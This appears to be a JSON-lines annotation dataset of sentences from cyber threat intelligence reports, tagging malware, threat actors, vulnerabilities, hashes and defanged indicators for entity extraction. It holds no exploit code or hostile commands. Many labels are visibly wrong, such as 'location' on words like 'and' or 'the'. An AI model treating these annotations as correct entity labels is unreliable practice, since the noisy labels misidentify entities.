Guidance for Disabling SMBv3 Compression, for a new remote code execution (RCE) vulnerability.","entities":[{"id":47955,"label":"TIME","start_offset":56,"end_offset":66},{"id":47956,"label":"identity","start_offset":67,"end_offset":76},{"id":47958,"label":"SOFTWARE","start_offset":152,"end_offset":157},{"id":47960,"label":"attack-pattern","start_offset":181,"end_offset":208},{"id":47957,"label":"identity","start_offset":119,"end_offset":128}],"relations":[],"Comments":[]} +{"id":12787,"text":"Shrouded Crossbow","entities":[],"relations":[],"Comments":[]} +{"id":4645,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} +{"id":4475,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50274,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50271,"label":"vulnerability","start_offset":42,"end_offset":66},{"id":50272,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50273,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[{"id":940,"from_id":50272,"to_id":50271,"type":"has"},{"id":941,"from_id":50273,"to_id":50271,"type":"has"}],"Comments":[]} +{"id":7011,"text":"Update as of April 27, 2021, 7 A.M. E.T.:","entities":[{"id":21964,"label":"TIME","start_offset":29,"end_offset":40}],"relations":[],"Comments":[]} +{"id":2965,"text":" Nothing spoils a new gadget more than having some kind of security or privacy problem related to it.","entities":[],"relations":[],"Comments":[]} +{"id":3485,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":113,"text":"Depending on what you are doing as part of your cloud infrastructure, you should be able to identify if any or all of these end goals could be targeted in your environment.","entities":[],"relations":[],"Comments":[]} +{"id":2226,"text":"Strings are encrypted using the following function, represented in Python:","entities":[],"relations":[],"Comments":[]} +{"id":5651,"text":"Join us Wednesday, April 30 at 3 p.m. EDT, for a new webinar, \u201cNeed to Defeat APTs?","entities":[{"id":17404,"label":"TIME","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} +{"id":852,"text":"But when legitimate programs execute illegitimate commands, it\u2019s harder to detect and prevent: it\u2019s not always clear whether a command is legitimate or not, and interfering with commands from legitimate programs can have significant (sometimes catastrophic) unintended consequences.","entities":[],"relations":[],"Comments":[]} +{"id":12508,"text":"This past year, TAG has been collaborating with Google\u2019s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":38926,"label":"malware","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} +{"id":13462,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[{"id":41931,"label":"tools","start_offset":61,"end_offset":67},{"id":41932,"label":"location","start_offset":68,"end_offset":71},{"id":41933,"label":"location","start_offset":72,"end_offset":80},{"id":41934,"label":"location","start_offset":94,"end_offset":97},{"id":41935,"label":"location","start_offset":122,"end_offset":126},{"id":41936,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} +{"id":12601,"text":"Analysis of the malware points to similarities between ColdLock and two previously known ransomware families, specifically Lockergoga, Freezing, and the EDA2 \u201ceducational\u201d ransomware kit.","entities":[{"id":39171,"label":"location","start_offset":24,"end_offset":30},{"id":39172,"label":"location","start_offset":47,"end_offset":54},{"id":39174,"label":"location","start_offset":64,"end_offset":67},{"id":39178,"label":"location","start_offset":145,"end_offset":148},{"id":39179,"label":"malware","start_offset":153,"end_offset":157}],"relations":[],"Comments":[]} +{"id":1559,"text":" An unexpected email message with an attachment that says you should \u201cenable content\u201d has a high likelihood of being malicious in some way.","entities":[],"relations":[],"Comments":[]} +{"id":2271,"text":"However, the operators of Glupteba are likely to attempt to regain control of the botnet using a backup command and control mechanism that uses data encoded on the Bitcoin blockchain.","entities":[{"id":45434,"label":"malware","start_offset":26,"end_offset":34},{"id":45433,"label":"SOFTWARE","start_offset":164,"end_offset":171}],"relations":[],"Comments":[]} +{"id":11162,"text":"We terminated 7 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":10528,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.","entities":[],"relations":[],"Comments":[]} +{"id":4665,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50571,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":13084,"text":"One of the secrets of Trend Micro\u2019s long-lasting success is being constantly on the lookout for where the next security threats might come from.","entities":[{"id":48899,"label":"identity","start_offset":22,"end_offset":33}],"relations":[],"Comments":[]} +{"id":6114,"text":"Table 2 ","entities":[],"relations":[],"Comments":[]} +{"id":8573,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":26496,"label":"location","start_offset":30,"end_offset":34},{"id":26497,"label":"attack-pattern","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} +{"id":5515,"text":"But first, here\u2019s more on what you need to know.","entities":[],"relations":[],"Comments":[]} +{"id":8737,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2020.","entities":[],"relations":[],"Comments":[]} +{"id":13940,"text":"Jon Clay, Director of Global Threat Communications at Trend Micro, outlines the phases of ransomware: ","entities":[{"id":48758,"label":"identity","start_offset":0,"end_offset":9},{"id":48759,"label":"identity","start_offset":54,"end_offset":65}],"relations":[{"id":458,"from_id":48759,"to_id":48758,"type":"related-to"}],"Comments":[]} +{"id":11925,"text":"JuneWe terminated 33 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} +{"id":2329,"text":"The script parsed the Mach-O at each section where the strings were located, then decoded the strings with their respective XOR keys, and patched the binary with the resulting strings.","entities":[],"relations":[],"Comments":[]} +{"id":4600,"text":"Since Exchange depends on Internet Information Services (IIS) webserver, an attacker can write ASPX webshells and run arbitrary commands as SYSTEM on the Exchange Server. In January 2021, we came across extensive use of Chopper ASPX webshells in targeted attacks by malicious actors to establish persistence and a foothold on the public-facing Outlook Web App servers. Trend Micro Cloud One\u2122 \u2013 Workload Security Correlation:","entities":[{"id":50484,"label":"SOFTWARE","start_offset":6,"end_offset":14},{"id":50487,"label":"malware","start_offset":95,"end_offset":109},{"id":50489,"label":"malware","start_offset":221,"end_offset":243},{"id":50490,"label":"SOFTWARE","start_offset":345,"end_offset":360},{"id":50491,"label":"SOFTWARE","start_offset":372,"end_offset":394},{"id":50485,"label":"SOFTWARE","start_offset":26,"end_offset":61},{"id":50486,"label":"SOFTWARE","start_offset":154,"end_offset":169},{"id":50488,"label":"TIME","start_offset":175,"end_offset":187}],"relations":[],"Comments":[]} +{"id":11771,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} +{"id":12457,"text":"We terminated 22 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Indonesia.","entities":[],"relations":[],"Comments":[]} +{"id":7658,"text":"We can\u2019t say for sure if this particular attack comes from TA505, another threat actor, an imitator, or perhaps just TA505 using another infrastructure.","entities":[{"id":23815,"label":"identity","start_offset":112,"end_offset":116}],"relations":[],"Comments":[]} +{"id":1566,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":13158,"text":"For instance, we observed Tropic Trooper move from a military hospital to the military\u2019s physically isolated network.","entities":[],"relations":[],"Comments":[]} +{"id":2857,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} +{"id":1786,"text":"We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion.","entities":[{"id":5282,"label":"malware","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} +{"id":930,"text":" All PClock malware family samples are properly classified as malicious by WildFire.","entities":[{"id":44902,"label":"malware","start_offset":5,"end_offset":11},{"id":44903,"label":"identity","start_offset":75,"end_offset":83}],"relations":[],"Comments":[]} +{"id":10755,"text":"Figure 4: Code snippets showing Daserf\u2019s decode function, which is the same as XXMM\u2019s Figure 5: Steganography toolkit used by REDBALDKNIGHT for XXMM Figure 6:","entities":[{"id":32868,"label":"malware","start_offset":32,"end_offset":38},{"id":32869,"label":"location","start_offset":71,"end_offset":75},{"id":32870,"label":"malware","start_offset":79,"end_offset":83},{"id":32872,"label":"threat-actor","start_offset":126,"end_offset":139}],"relations":[],"Comments":[]} +{"id":5538,"text":"Thus, with just one attack, the hackers can get their Magecart code onto potentially thousands of payment pages.","entities":[{"id":51537,"label":"malware","start_offset":54,"end_offset":62}],"relations":[],"Comments":[]} +{"id":3269,"text":"We share more details of each command in the next section.","entities":[],"relations":[],"Comments":[]} +{"id":52,"text":"While only a tiny fraction (possibly 1 in 1000) of systems infected with a banking Trojan pay out for attackers, a much higher portion of ransomware victims pay to get their files back.","entities":[],"relations":[],"Comments":[]} +{"id":10975,"text":"We will also continue to share more detailed analysis of vulnerabilities we find, phishing and malware campaigns that we see, and other interesting or noteworthy trends across this space.","entities":[{"id":33422,"label":"location","start_offset":3,"end_offset":7},{"id":33423,"label":"attack-pattern","start_offset":82,"end_offset":90},{"id":33424,"label":"location","start_offset":91,"end_offset":94},{"id":33425,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} +{"id":12476,"text":"We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.","entities":[],"relations":[],"Comments":[]} +{"id":7908,"text":"We can\u2019t say why this shift is happening.","entities":[],"relations":[],"Comments":[]} +{"id":4797,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50696,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":340,"text":" History has shown that paying the ransom will likely allow you to retrieve your files, but the best defense against ransomware is having up-to-date back-ups or by preventing the infection all-together.","entities":[],"relations":[],"Comments":[]} +{"id":14417,"text":"In both cases the intelligence coming from endpoints, servers, and the network allowed researchers to identify the attack chain and all the components used within the attack.","entities":[],"relations":[],"Comments":[]} +{"id":7433,"text":" Figure 1. The sequence of Pawn Storm's OAuth abuse A dissection of Pawn Storm OAuth attacks","entities":[{"id":23118,"label":"threat-actor","start_offset":36,"end_offset":46},{"id":23119,"label":"threat-actor","start_offset":77,"end_offset":87}],"relations":[],"Comments":[]} +{"id":9732,"text":"The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government.","entities":[],"relations":[],"Comments":[]} +{"id":10403,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":4710,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50597,"label":"identity","start_offset":61,"end_offset":67},{"id":50598,"label":"identity","start_offset":79,"end_offset":91},{"id":50599,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} +{"id":3199,"text":"Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers\u2019 account.","entities":[{"id":48324,"label":"Infrastucture","start_offset":177,"end_offset":194},{"id":9783,"label":"SHA1","start_offset":94,"end_offset":158}],"relations":[{"id":406,"from_id":48324,"to_id":9783,"type":"hosts"}],"Comments":[]} +{"id":7170,"text":" Andariel has been quite active these past few months.","entities":[],"relations":[],"Comments":[]} +{"id":3428,"text":"Win64.BIOPASS.A","entities":[{"id":49120,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} +{"id":10470,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":31836,"label":"malware","start_offset":41,"end_offset":46}],"relations":[],"Comments":[]} +{"id":722,"text":" If you cannot install the latest upgrade, see the Mitigation section on the Atlassian security advisory for information on how to mitigate this vulnerability by running a script for the operating system your Confluence server is hosted on. Palo Alto Networks provides protection against the exploitation of this vulnerability: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":46292,"label":"identity","start_offset":77,"end_offset":86},{"id":46293,"label":"SOFTWARE","start_offset":209,"end_offset":219},{"id":46294,"label":"identity","start_offset":242,"end_offset":260},{"id":46295,"label":"identity","start_offset":330,"end_offset":348}],"relations":[],"Comments":[]} +{"id":2289,"text":"To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.","entities":[{"id":45445,"label":"SOFTWARE","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} +{"id":2744,"text":" Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 \"Bash Remote Code Execution Vulnerability.\u201d ","entities":[{"id":47990,"label":"identity","start_offset":1,"end_offset":19},{"id":47991,"label":"vulnerability","start_offset":129,"end_offset":169}],"relations":[],"Comments":[]} +{"id":3837,"text":"Encryption key using blowfish","entities":[],"relations":[],"Comments":[]} +{"id":11506,"text":"These phishing domains have been blocked through Google Safe Browsing \u2013 a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":35201,"label":"attack-pattern","start_offset":6,"end_offset":14},{"id":35203,"label":"location","start_offset":129,"end_offset":132},{"id":35204,"label":"location","start_offset":148,"end_offset":151}],"relations":[],"Comments":[]} +{"id":2403,"text":"To understand the impact of this vulnerability, we analyzed all the available information and located the issue in the source code.","entities":[],"relations":[],"Comments":[]} +{"id":3767,"text":"If successful, CVE-2022-22960 can then be leveraged to execute these overwritten paths with root permissions using the sudo command.","entities":[{"id":49599,"label":"vulnerability","start_offset":15,"end_offset":29}],"relations":[],"Comments":[]} +{"id":4572,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50414,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} +{"id":10292,"text":"Indicators of compromise IP addresses IP address Description Dates active 34.243.239[.]199 Connects to email servers of compromised accounts.","entities":[{"id":31425,"label":"IPV4","start_offset":78,"end_offset":94}],"relations":[],"Comments":[]} +{"id":8103,"text":"Parsed C&C Server address","entities":[],"relations":[],"Comments":[]} +{"id":9717,"text":"STRINGDATA::RESOURCE_ID","entities":[],"relations":[],"Comments":[]} +{"id":2259,"text":" We created the AutoFocus tag TDrop2 to identify samples of this new variant and added known C2 domains and hash values to the Threat Prevention product set.","entities":[{"id":45431,"label":"malware","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} +{"id":2949,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":4337,"text":"The final payload is a .NET DLL file designed to steal documents and images with the following extensions: File extension Description TXT Text file PDF PDF file PNG Image file in PNG format JPG Image file in JPG format DOC Word document XLS Excel document XLM Excel document with macros ODP OpenDocument Presentation ODS OpenDocument Sheet ODT OpenDocument Text RTF Rich Text Format file PPT PowerPoint document XLSX Excel document XLSM Excel document with macros DOCX Word document PPTX PowerPoint document JPEG Image file in JPEG format ","entities":[],"relations":[],"Comments":[]} +{"id":7281,"text":"mapping","entities":[],"relations":[],"Comments":[]} +{"id":3686,"text":"In the case of FIN7, the use of application shimming databases (which can allow developers to apply fixes to applications without rewriting code) and hooking processes that allow the modification of program behaviors are some of the techniques that can be applied.","entities":[{"id":49480,"label":"threat-actor","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} +{"id":9428,"text":"After the payload is decrypted, it is loaded in the machine\u2019s memory and is executed using a stealthy method: PuppetLoader starts by loading a legitimate DLL from the Windows\\System32 directory.","entities":[{"id":29013,"label":"location","start_offset":69,"end_offset":72},{"id":29014,"label":"malware","start_offset":110,"end_offset":122}],"relations":[],"Comments":[]} +{"id":2771,"text":"On January 2, 2017, one Bitcoin was worth US $985.56.","entities":[{"id":47999,"label":"TIME","start_offset":3,"end_offset":18},{"id":48000,"label":"SOFTWARE","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} +{"id":13985,"text":"ATT&CK gives you the full picture of the threat, and XDR coordinates protection against the full picture of that threat.","entities":[{"id":48776,"label":"SOFTWARE","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} +{"id":1198,"text":"This can include receiving instructions from a cloud server under the control of the SDK author.","entities":[],"relations":[],"Comments":[]} +{"id":14331,"text":"Virtual Girlfriend in the list of games advertised by hxxp:\/\/www[.]roundyearfun[.]org Figure 18.","entities":[{"id":48557,"label":"URL","start_offset":54,"end_offset":85}],"relations":[],"Comments":[]} +{"id":7519,"text":"By computing (123 ^ 959) mod 713 = 340 we get the encrypted value of the first character (see number 340 in the figure below).","entities":[],"relations":[],"Comments":[]} +{"id":13966,"text":"We have been collectively saying in our industry for the last 15-20 years that a layered approach to your security stack is a \u201cbest practice,\u201d but as with all best practices, these are ideals rather than reality for so many charged with protecting their organizations.","entities":[],"relations":[],"Comments":[]} +{"id":2540,"text":"While phishing emails used to be pretty easy for almost anyone to spot, particularly after some awareness training, we are seeing increasingly sophisticated attacks in which the threat actors have done plenty of homework on their intended victims.","entities":[{"id":47731,"label":"attack-pattern","start_offset":6,"end_offset":21}],"relations":[],"Comments":[]} +{"id":9708,"text":"Computer info encrypted with AES256 key Figure 25.","entities":[],"relations":[],"Comments":[]} +{"id":11659,"text":"The content of the newly created folder contains a few files, including Rekeywiz (EFS REKEY wizard, FA86B5BC5343CA92C235304B8DCBCF4188C6BE7D4621C625564BEBD5326ED850), which is a legitimate Windows application.","entities":[{"id":35781,"label":"location","start_offset":4,"end_offset":11},{"id":35782,"label":"SHA2","start_offset":100,"end_offset":164}],"relations":[],"Comments":[]} +{"id":4224,"text":"Sample of the app\u2019s code Periodically, the malware tries to contact the Command-and-Control (C&C) server with the username encoded into parameters.","entities":[],"relations":[],"Comments":[]} +{"id":3190,"text":"The script used to check for existing BIOPASS RAT infections If the script confirms that the visitor has not yet been infected, it will then replace the original page content with the attackers\u2019 own content.","entities":[{"id":48315,"label":"malware","start_offset":38,"end_offset":49}],"relations":[],"Comments":[]} +{"id":8961,"text":", another warning message about an unverified developer is displayed.","entities":[],"relations":[],"Comments":[]} +{"id":2557,"text":" And from this we can see how credential theft is the keystone of Shamoon 2 attacks; if an organization can prevent credential theft, the Shamoon 2 attacks can\u2019t succeed.","entities":[{"id":47751,"label":"attack-pattern","start_offset":30,"end_offset":46},{"id":47753,"label":"attack-pattern","start_offset":116,"end_offset":132},{"id":47752,"label":"threat-actor","start_offset":66,"end_offset":75},{"id":47754,"label":"threat-actor","start_offset":138,"end_offset":147}],"relations":[{"id":346,"from_id":47752,"to_id":47751,"type":"uses"},{"id":347,"from_id":47754,"to_id":47753,"type":"uses"}],"Comments":[]} +{"id":12554,"text":"Then the extracted binary was heavily obfuscated with a relatively tedious encoding mechanism--each string is XOR encoded with a different key.","entities":[],"relations":[],"Comments":[]} +{"id":4963,"text":"Threat Analysis Group will continue to identify bad actors and share relevant information with others in the industry, with the goal of bringing awareness to these issues, protecting you and fighting bad actors to prevent future attacks.","entities":[{"id":50986,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} +{"id":8179,"text":" The email contained two PDF file attachments.","entities":[],"relations":[],"Comments":[]} +{"id":3103,"text":" For shared-hosting environments like public cloud providers, this means that one hosted customer could potentially access the information of any other customer hosted on the same hardware.","entities":[],"relations":[],"Comments":[]} +{"id":4932,"text":"For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50949,"label":"identity","start_offset":144,"end_offset":162}],"relations":[],"Comments":[]} +{"id":2337,"text":"Threat actors have used N-days shortly after a patch is released to capitalize on the patching delay of their targets.","entities":[],"relations":[],"Comments":[]} +{"id":763,"text":"When the size of the pool hits a predefined threshold, which is currently 100k (0x186A0 as highlighted in figure 3), it performs the real freeing operation (ReclaimUnmarkedBlocks). Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":3433,"text":"aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan","entities":[{"id":10324,"label":"SHA2","start_offset":67,"end_offset":131},{"id":10330,"label":"SHA2","start_offset":471,"end_offset":535},{"id":10332,"label":"SHA2","start_offset":601,"end_offset":665},{"id":10326,"label":"SHA2","start_offset":200,"end_offset":264},{"id":10328,"label":"SHA2","start_offset":333,"end_offset":397},{"id":49123,"label":"FILEPATH","start_offset":0,"end_offset":7},{"id":49129,"label":"malware","start_offset":280,"end_offset":307},{"id":49132,"label":"FILEPATH","start_offset":667,"end_offset":673},{"id":49135,"label":"malware","start_offset":147,"end_offset":174},{"id":49136,"label":"malware","start_offset":418,"end_offset":445},{"id":49124,"label":"malware","start_offset":43,"end_offset":65},{"id":49125,"label":"FILEPATH","start_offset":133,"end_offset":145},{"id":49126,"label":"malware","start_offset":176,"end_offset":198},{"id":49127,"label":"FILEPATH","start_offset":266,"end_offset":278},{"id":49128,"label":"malware","start_offset":309,"end_offset":331},{"id":49130,"label":"FILEPATH","start_offset":399,"end_offset":416},{"id":49131,"label":"FILEPATH","start_offset":537,"end_offset":546},{"id":49133,"label":"malware","start_offset":577,"end_offset":599},{"id":49134,"label":"malware","start_offset":9,"end_offset":41},{"id":49137,"label":"malware","start_offset":447,"end_offset":469},{"id":49138,"label":"malware","start_offset":548,"end_offset":575},{"id":49139,"label":"malware","start_offset":675,"end_offset":710}],"relations":[{"id":729,"from_id":49123,"to_id":49124,"type":"indicates"},{"id":730,"from_id":49134,"to_id":49124,"type":"duplicate-of"},{"id":731,"from_id":10324,"to_id":49124,"type":"indicates"},{"id":732,"from_id":49125,"to_id":49124,"type":"indicates"},{"id":733,"from_id":49135,"to_id":49126,"type":"duplicate-of"},{"id":734,"from_id":10326,"to_id":49126,"type":"indicates"},{"id":735,"from_id":49127,"to_id":49126,"type":"indicates"},{"id":736,"from_id":49127,"to_id":10326,"type":"duplicate-of"},{"id":737,"from_id":49129,"to_id":49128,"type":"duplicate-of"},{"id":738,"from_id":10328,"to_id":49128,"type":"indicates"},{"id":739,"from_id":49130,"to_id":49128,"type":"indicates"},{"id":740,"from_id":49130,"to_id":10328,"type":"duplicate-of"},{"id":741,"from_id":49136,"to_id":49137,"type":"duplicate-of"},{"id":742,"from_id":49131,"to_id":10330,"type":"duplicate-of"},{"id":743,"from_id":49131,"to_id":49137,"type":"indicates"},{"id":744,"from_id":10330,"to_id":49137,"type":"indicates"},{"id":745,"from_id":49138,"to_id":49133,"type":"duplicate-of"},{"id":746,"from_id":49139,"to_id":49133,"type":"duplicate-of"},{"id":747,"from_id":49132,"to_id":10332,"type":"duplicate-of"},{"id":748,"from_id":49132,"to_id":49133,"type":"indicates"},{"id":749,"from_id":10332,"to_id":49133,"type":"indicates"}],"Comments":[]} +{"id":2726,"text":" For SMBv3 clients would require enticing a user to connect to a compromised SMBv3 server that they control.","entities":[{"id":47968,"label":"SOFTWARE","start_offset":5,"end_offset":10},{"id":47969,"label":"SOFTWARE","start_offset":77,"end_offset":82}],"relations":[],"Comments":[]} +{"id":12185,"text":"No longer do groups need to have the technical expertise, now they just need resources.","entities":[{"id":37688,"label":"identity","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} +{"id":5054,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.","entities":[{"id":51145,"label":"location","start_offset":220,"end_offset":227},{"id":51148,"label":"location","start_offset":253,"end_offset":261},{"id":51149,"label":"identity","start_offset":179,"end_offset":216},{"id":51141,"label":"identity","start_offset":47,"end_offset":50},{"id":51142,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":51143,"label":"identity","start_offset":112,"end_offset":115},{"id":51144,"label":"identity","start_offset":130,"end_offset":145},{"id":51146,"label":"location","start_offset":229,"end_offset":235},{"id":51147,"label":"location","start_offset":237,"end_offset":247}],"relations":[{"id":1050,"from_id":51142,"to_id":51144,"type":"attributed-to"},{"id":1051,"from_id":51142,"to_id":51149,"type":"targets"},{"id":1052,"from_id":51142,"to_id":51145,"type":"targets"},{"id":1053,"from_id":51142,"to_id":51146,"type":"targets"},{"id":1054,"from_id":51142,"to_id":51147,"type":"targets"},{"id":1055,"from_id":51142,"to_id":51148,"type":"targets"}],"Comments":[]} +{"id":976,"text":"Risks and Mitigation ","entities":[],"relations":[],"Comments":[]} +{"id":11647,"text":"SideWinder has been very active in 2020.","entities":[],"relations":[],"Comments":[]} +{"id":13596,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":2582,"text":"In today\u2019s environment, threat actors favor using ransomware to encrypt data and systems and often extort victims for significant amounts of cryptocurrency in exchange for decryption keys, sometimes turning up the pressure with the threat of publishing stolen data.","entities":[],"relations":[],"Comments":[]} +{"id":3134,"text":"When attackers have complete control of your home router, they can install attack software that they control, turning the device into a \u201cbot\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":6858,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":1793,"text":"Mapping the infection","entities":[],"relations":[],"Comments":[]} +{"id":4995,"text":"In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.","entities":[{"id":51053,"label":"TIME","start_offset":3,"end_offset":15},{"id":51054,"label":"SOFTWARE","start_offset":113,"end_offset":119}],"relations":[],"Comments":[]} +{"id":7743,"text":"While FlawedAmmyy RAT was still the final payload, the downloader was different \u2014 this operation used a .DLL variant.","entities":[{"id":24051,"label":"malware","start_offset":6,"end_offset":17}],"relations":[],"Comments":[]} +{"id":11155,"text":"It was last updated on August 5, 2020.","entities":[],"relations":[],"Comments":[]} +{"id":11215,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} +{"id":9739,"text":"The screenshots below show the malicious attachments, which are disguised to look real, similar to any typical phishing document.","entities":[{"id":29714,"label":"location","start_offset":60,"end_offset":63},{"id":29715,"label":"location","start_offset":82,"end_offset":86},{"id":29716,"label":"attack-pattern","start_offset":111,"end_offset":119}],"relations":[],"Comments":[]} +{"id":1968,"text":"For the RDG server we referred to the following walkthrough: http:\/\/terrytlslau.tls1.cc\/2014\/01\/deploying-remote-desktop-gateway-in.html.","entities":[{"id":45199,"label":"URL","start_offset":61,"end_offset":136}],"relations":[],"Comments":[]} +{"id":4114,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":831,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":12504,"text":"The following image shows a webpage mimicking a software crack download which delivers a variant of Glupteba to users instead of the promised software.","entities":[{"id":38915,"label":"malware","start_offset":100,"end_offset":108}],"relations":[],"Comments":[]} +{"id":1301,"text":"The response data is decrypted using the RC4 cryptographic stream cipher.","entities":[],"relations":[],"Comments":[]} +{"id":6647,"text":"This group generally used spear-phishing with macro-enabled Office documents to deliver their payloads, which were either embedded directly in the macro, or hosted on a first stage C2 server.","entities":[{"id":20622,"label":"location","start_offset":26,"end_offset":31},{"id":20623,"label":"attack-pattern","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} +{"id":2361,"text":"There are also other functionalities built-in to the components which were not directly accessed from the binaries included in the payload but may be used by additional stages which can be downloaded onto the victim's machine.","entities":[],"relations":[],"Comments":[]} +{"id":2550,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":10827,"text":"MSG_TRIG_ALARM_SYNC","entities":[],"relations":[],"Comments":[]} +{"id":13032,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":40646,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":40647,"label":"attack-pattern","start_offset":130,"end_offset":138}],"relations":[],"Comments":[]} +{"id":3437,"text":"Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":49198,"label":"attack-pattern","start_offset":48,"end_offset":69},{"id":49200,"label":"vulnerability","start_offset":26,"end_offset":44},{"id":49199,"label":"attack-pattern","start_offset":74,"end_offset":113}],"relations":[{"id":752,"from_id":49198,"to_id":49200,"type":"targets"},{"id":753,"from_id":49199,"to_id":49200,"type":"targets"}],"Comments":[]} +{"id":5992,"text":" Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[{"id":18457,"label":"location","start_offset":41,"end_offset":44},{"id":18458,"label":"threat-actor","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} +{"id":3684,"text":"We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique.","entities":[{"id":49477,"label":"malware","start_offset":29,"end_offset":45},{"id":49479,"label":"attack-pattern","start_offset":51,"end_offset":107}],"relations":[{"id":803,"from_id":49477,"to_id":49479,"type":"uses"}],"Comments":[]} +{"id":1926,"text":"One of the URLs is for the decoy 